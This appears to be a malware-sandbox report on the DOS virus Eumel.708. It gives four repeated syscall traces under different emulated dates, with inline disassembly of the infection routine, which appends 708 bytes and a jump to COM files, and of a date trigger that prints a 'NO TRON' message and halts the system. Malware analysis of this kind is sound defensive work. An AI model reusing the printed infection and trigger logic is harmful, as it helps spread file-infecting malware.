Sample viewer

vx.netlux.org/Virus.DOS.Eumel.708

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:12:41.584173208Z 26 PC: 13e6f | Set disk transfer address
2018-12-17T22:12:41.586204011Z 25 PC: 13e7d | Get default drive
2018-12-17T22:12:41.587418877Z 14 PC: 13e87 | Set default drive (Drive = 'D')
2018-12-17T22:12:41.588736071Z 78 PC: 13e91 | Find first file
2018-12-17T22:12:41.595872144Z 61 PC: 13e9e | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:12:41.603125302Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.604530052Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.606308758Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.609176049Z 61 PC: 13e9e | Open file (Filename = 'PRINT.COM')
2018-12-17T22:12:41.61598703Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.617320129Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.62020455Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.623410223Z 61 PC: 13e9e | Open file (Filename = 'HELLO.COM')
2018-12-17T22:12:41.630464685Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.632716445Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.634880143Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.637730865Z 61 PC: 13e9e | Open file (Filename = 'PHANG.COM')
2018-12-17T22:12:41.650442198Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.653082331Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.655167286Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.659136791Z 61 PC: 13e9e | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:12:41.66581652Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.667416873Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.670495717Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.673859962Z 61 PC: 13e9e | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:12:41.680559771Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.682269619Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.68628976Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.688749357Z 61 PC: 13e9e | Open file (Filename = 'PAH.COM')
2018-12-17T22:12:41.695204389Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.698140782Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.700130283Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.702883407Z 61 PC: 13e9e | Open file (Filename = 'TEST.COM')
2018-12-17T22:12:41.713054886Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.714753952Z 87 PC: 13eb5 | Get or set file date and time
2018-12-17T22:12:41.716344464Z 44 PC: 13ed2 | Get time 0x13ed2: add dl, 0x66
0x13ed5: mov byte ptr [bp + 0x109], dl
0x13ed9: mov ax, 0x4200
0x13edc: call 0x13f63
0x13edf: mov ah, 0x3f
0x13ee1: lea dx, word ptr [bp + 0x3c0]
0x13ee5: mov cx, 3
0x13ee8: int 0x21
0x13eea: mov ax, 0x4202
0x13eed: call 0x13f63
0x13ef0: sub ax, 3
0x13ef3: mov word ptr cs:[bp + 0x230], ax
0x13ef8: lea si, word ptr [bp + 0x105]
0x13efc: mov di, 0xfac8
0x13eff: mov cx, 0x2c4
0x13f02: cld
0x13f03: rep movsb byte ptr es:[di], byte ptr [si]
0x13f05: mov si, 0xfae8
0x13f08: call 0x23e50
0x13f0b: mov ah, 0x40
2018-12-17T22:12:41.719231134Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.720522142Z 63 PC: 13eea | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:12:41.727685192Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.729968956Z 64 PC: 13f15 | Write file or device (Write 708 bytes on handle 5)
2018-12-17T22:12:41.742895182Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.744360647Z 64 PC: 13f26 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:12:41.74815517Z 87 PC: 13f2d | Get or set file date and time
2018-12-17T22:12:41.749661923Z 62 PC: 13f31 | Close file
2018-12-17T22:12:41.757902628Z 42 PC: 13f35 | Get date 0x13f35: add dl, 9
0x13f38: cmp dh, dl
0x13f3a: jne 0x13f4f
0x13f3c: cmp cx, 0x7cb
0x13f40: jb 0x13f4f
0x13f42: mov ah, 9
0x13f44: lea dx, word ptr [bp + 0x232]
0x13f48: int 0x21
0x13f4a: call 0x13fbe
0x13f4d: cli
0x13f4e: hlt
0x13f4f: mov ah, 0x1a
0x13f51: mov dx, 0x80
0x13f54: int 0x21
0x13f56: mov ah, 0xe
0x13f58: mov dl, byte ptr [bp + 0x3c9]
0x13f5c: int 0x21
0x13f5e: popaw
0x13f5f: push 0x100
0x13f62: ret
2018-12-17T22:12:41.761325246Z 26 PC: 13f56 | Set disk transfer address
2018-12-17T22:12:41.762617022Z 14 PC: 13f5e | Set default drive (Drive = 'A')
2018-12-17T22:12:41.764082711Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T22:12:41.770130849Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2529,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:01.226788882Z 26 PC: 13e6f | Set disk transfer address
2018-12-25T11:46:01.235022524Z 25 PC: 13e7d | Get default drive
2018-12-25T11:46:01.236198897Z 14 PC: 13e87 | Set default drive (Drive = 'D')
2018-12-25T11:46:01.237772814Z 78 PC: 13e91 | Find first file
2018-12-25T11:46:01.250818862Z 61 PC: 13e9e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:01.257156988Z 66 PC: 13f69 | Move file pointer
2018-12-25T11:46:01.25867462Z 62 PC: 13ec2 | Close file
2018-12-25T11:46:01.261124341Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.263801069Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.27079206Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.273080866Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.275035334Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.277614633Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.284263716Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.286437348Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.288144139Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.290593002Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.303157075Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.304497095Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.306119431Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.309387993Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.316073414Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.317447498Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.32028273Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.322927605Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.329603244Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.332072236Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.334088182Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.336499167Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.344036963Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.34579258Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.347779103Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.351664765Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.358371114Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.360023226Z 87 PC: 13eb5 | Get or set file date and time
2018-12-25T11:46:01.361826435Z 44 PC: 13ed2 | Get time 0x13ed2: add dl, 0x66
0x13ed5: mov byte ptr [bp + 0x109], dl
0x13ed9: mov ax, 0x4200
0x13edc: call 0x13f63
0x13edf: mov ah, 0x3f
0x13ee1: lea dx, word ptr [bp + 0x3c0]
0x13ee5: mov cx, 3
0x13ee8: int 0x21
0x13eea: mov ax, 0x4202
0x13eed: call 0x13f63
0x13ef0: sub ax, 3
0x13ef3: mov word ptr cs:[bp + 0x230], ax
0x13ef8: lea si, word ptr [bp + 0x105]
0x13efc: mov di, 0xfac8
0x13eff: mov cx, 0x2c4
0x13f02: cld
0x13f03: rep movsb byte ptr es:[di], byte ptr [si]
0x13f05: mov si, 0xfae8
0x13f08: call 0x23e50
0x13f0b: mov ah, 0x40
2018-12-25T11:46:01.364725145Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.366702815Z 63 PC: 13eea | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:01.369959573Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.372350661Z 64 PC: 13f15 | Write file or device (Write 708 bytes on handle 5)
2018-12-25T11:46:01.38595599Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.387750128Z 64 PC: 13f26 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:01.390389022Z 87 PC: 13f2d | Get or set file date and time
2018-12-25T11:46:01.39179004Z 62 PC: 13f31 | Close file
2018-12-25T11:46:01.400157381Z 42 PC: 13f35 | Get date 0x13f35: add dl, 9
0x13f38: cmp dh, dl
0x13f3a: jne 0x13f4f
0x13f3c: cmp cx, 0x7cb
0x13f40: jb 0x13f4f
0x13f42: mov ah, 9
0x13f44: lea dx, word ptr [bp + 0x232]
0x13f48: int 0x21
0x13f4a: call 0x13fbe
0x13f4d: cli
0x13f4e: hlt
0x13f4f: mov ah, 0x1a
0x13f51: mov dx, 0x80
0x13f54: int 0x21
0x13f56: mov ah, 0xe
0x13f58: mov dl, byte ptr [bp + 0x3c9]
0x13f5c: int 0x21
0x13f5e: popaw
0x13f5f: push 0x100
0x13f62: ret
2018-12-25T11:46:01.402163961Z 26 PC: 13f56 | Set disk transfer address
2018-12-25T11:46:01.403031826Z 14 PC: 13f5e | Set default drive (Drive = 'A')
2018-12-25T11:46:01.404979994Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T11:46:01.410304949Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2529,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:01.550827092Z 26 PC: 13e6f | Set disk transfer address
2018-12-25T11:46:01.552448682Z 25 PC: 13e7d | Get default drive
2018-12-25T11:46:01.553590375Z 14 PC: 13e87 | Set default drive (Drive = 'D')
2018-12-25T11:46:01.554688663Z 78 PC: 13e91 | Find first file
2018-12-25T11:46:01.561704226Z 61 PC: 13e9e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:01.568853205Z 66 PC: 13f69 | Move file pointer
2018-12-25T11:46:01.570100996Z 62 PC: 13ec2 | Close file
2018-12-25T11:46:01.571915183Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.574920099Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.582433076Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.583820143Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.58596611Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.588655577Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.596737498Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.598952613Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.600745334Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.603794821Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.617249026Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.6186719Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.620309719Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.623274532Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.630364884Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.631707324Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.633909008Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.636555396Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.64438053Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.646284162Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.648157275Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.651028831Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.658946952Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.66039504Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.662069923Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.664824332Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.672756047Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.674108201Z 87 PC: 13eb5 | Get or set file date and time
2018-12-25T11:46:01.675437585Z 44 PC: 13ed2 | Get time 0x13ed2: add dl, 0x66
0x13ed5: mov byte ptr [bp + 0x109], dl
0x13ed9: mov ax, 0x4200
0x13edc: call 0x13f63
0x13edf: mov ah, 0x3f
0x13ee1: lea dx, word ptr [bp + 0x3c0]
0x13ee5: mov cx, 3
0x13ee8: int 0x21
0x13eea: mov ax, 0x4202
0x13eed: call 0x13f63
0x13ef0: sub ax, 3
0x13ef3: mov word ptr cs:[bp + 0x230], ax
0x13ef8: lea si, word ptr [bp + 0x105]
0x13efc: mov di, 0xfac8
0x13eff: mov cx, 0x2c4
0x13f02: cld
0x13f03: rep movsb byte ptr es:[di], byte ptr [si]
0x13f05: mov si, 0xfae8
0x13f08: call 0x23e50
0x13f0b: mov ah, 0x40
2018-12-25T11:46:01.677862995Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.679077996Z 63 PC: 13eea | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:01.686106035Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.68821903Z 64 PC: 13f15 | Write file or device (Write 708 bytes on handle 5)
2018-12-25T11:46:01.703707643Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.704991051Z 64 PC: 13f26 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:01.708297131Z 87 PC: 13f2d | Get or set file date and time
2018-12-25T11:46:01.709792131Z 62 PC: 13f31 | Close file
2018-12-25T11:46:01.718119904Z 42 PC: 13f35 | Get date 0x13f35: add dl, 9
0x13f38: cmp dh, dl
0x13f3a: jne 0x13f4f
0x13f3c: cmp cx, 0x7cb
0x13f40: jb 0x13f4f
0x13f42: mov ah, 9
0x13f44: lea dx, word ptr [bp + 0x232]
0x13f48: int 0x21
0x13f4a: call 0x13fbe
0x13f4d: cli
0x13f4e: hlt
0x13f4f: mov ah, 0x1a
0x13f51: mov dx, 0x80
0x13f54: int 0x21
0x13f56: mov ah, 0xe
0x13f58: mov dl, byte ptr [bp + 0x3c9]
0x13f5c: int 0x21
0x13f5e: popaw
0x13f5f: push 0x100
0x13f62: ret
2018-12-25T11:46:01.720617564Z 26 PC: 13f56 | Set disk transfer address
2018-12-25T11:46:01.721643955Z 14 PC: 13f5e | Set default drive (Drive = 'A')
2018-12-25T11:46:01.722721295Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T11:46:01.728989254Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":10,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2529,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:01.804715149Z 26 PC: 13e6f | Set disk transfer address
2018-12-25T11:46:01.806714169Z 25 PC: 13e7d | Get default drive
2018-12-25T11:46:01.80874555Z 14 PC: 13e87 | Set default drive (Drive = 'D')
2018-12-25T11:46:01.810576974Z 78 PC: 13e91 | Find first file
2018-12-25T11:46:01.818285733Z 61 PC: 13e9e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:01.826932032Z 66 PC: 13f69 | Move file pointer
2018-12-25T11:46:01.828787338Z 62 PC: 13ec2 | Close file
2018-12-25T11:46:01.830688481Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.833799142Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.847124651Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.8486833Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.852199228Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.854943168Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.862183496Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.864340252Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.866284144Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.868963416Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.875973028Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.877713318Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.879409272Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.881938528Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.889709657Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.89101223Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.892833239Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.895729641Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.902669441Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.904085515Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.906280086Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.908950319Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.91673585Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.918512703Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.920993431Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.923700299Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.931282924Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.932736471Z 87 PC: 13eb5 | Get or set file date and time
2018-12-25T11:46:01.934091593Z 44 PC: 13ed2 | Get time 0x13ed2: add dl, 0x66
0x13ed5: mov byte ptr [bp + 0x109], dl
0x13ed9: mov ax, 0x4200
0x13edc: call 0x13f63
0x13edf: mov ah, 0x3f
0x13ee1: lea dx, word ptr [bp + 0x3c0]
0x13ee5: mov cx, 3
0x13ee8: int 0x21
0x13eea: mov ax, 0x4202
0x13eed: call 0x13f63
0x13ef0: sub ax, 3
0x13ef3: mov word ptr cs:[bp + 0x230], ax
0x13ef8: lea si, word ptr [bp + 0x105]
0x13efc: mov di, 0xfac8
0x13eff: mov cx, 0x2c4
0x13f02: cld
0x13f03: rep movsb byte ptr es:[di], byte ptr [si]
0x13f05: mov si, 0xfae8
0x13f08: call 0x23e50
0x13f0b: mov ah, 0x40
2018-12-25T11:46:01.936950169Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.939055718Z 63 PC: 13eea | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:01.946086005Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.947626667Z 64 PC: 13f15 | Write file or device (Write 708 bytes on handle 5)
2018-12-25T11:46:01.964001124Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.965389668Z 64 PC: 13f26 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:01.968175563Z 87 PC: 13f2d | Get or set file date and time
2018-12-25T11:46:01.984444959Z 62 PC: 13f31 | Close file
2018-12-25T11:46:01.993387126Z 42 PC: 13f35 | Get date 0x13f35: add dl, 9
0x13f38: cmp dh, dl
0x13f3a: jne 0x13f4f
0x13f3c: cmp cx, 0x7cb
0x13f40: jb 0x13f4f
0x13f42: mov ah, 9
0x13f44: lea dx, word ptr [bp + 0x232]
0x13f48: int 0x21
0x13f4a: call 0x13fbe
0x13f4d: cli
0x13f4e: hlt
0x13f4f: mov ah, 0x1a
0x13f51: mov dx, 0x80
0x13f54: int 0x21
0x13f56: mov ah, 0xe
0x13f58: mov dl, byte ptr [bp + 0x3c9]
0x13f5c: int 0x21
0x13f5e: popaw
0x13f5f: push 0x100
0x13f62: ret
2018-12-25T11:46:01.995608738Z 9 PC: 13f4a | Display string (String= ' You have got the NO TRON Virus! Don't support TRON in D-17149 Stavenhagen')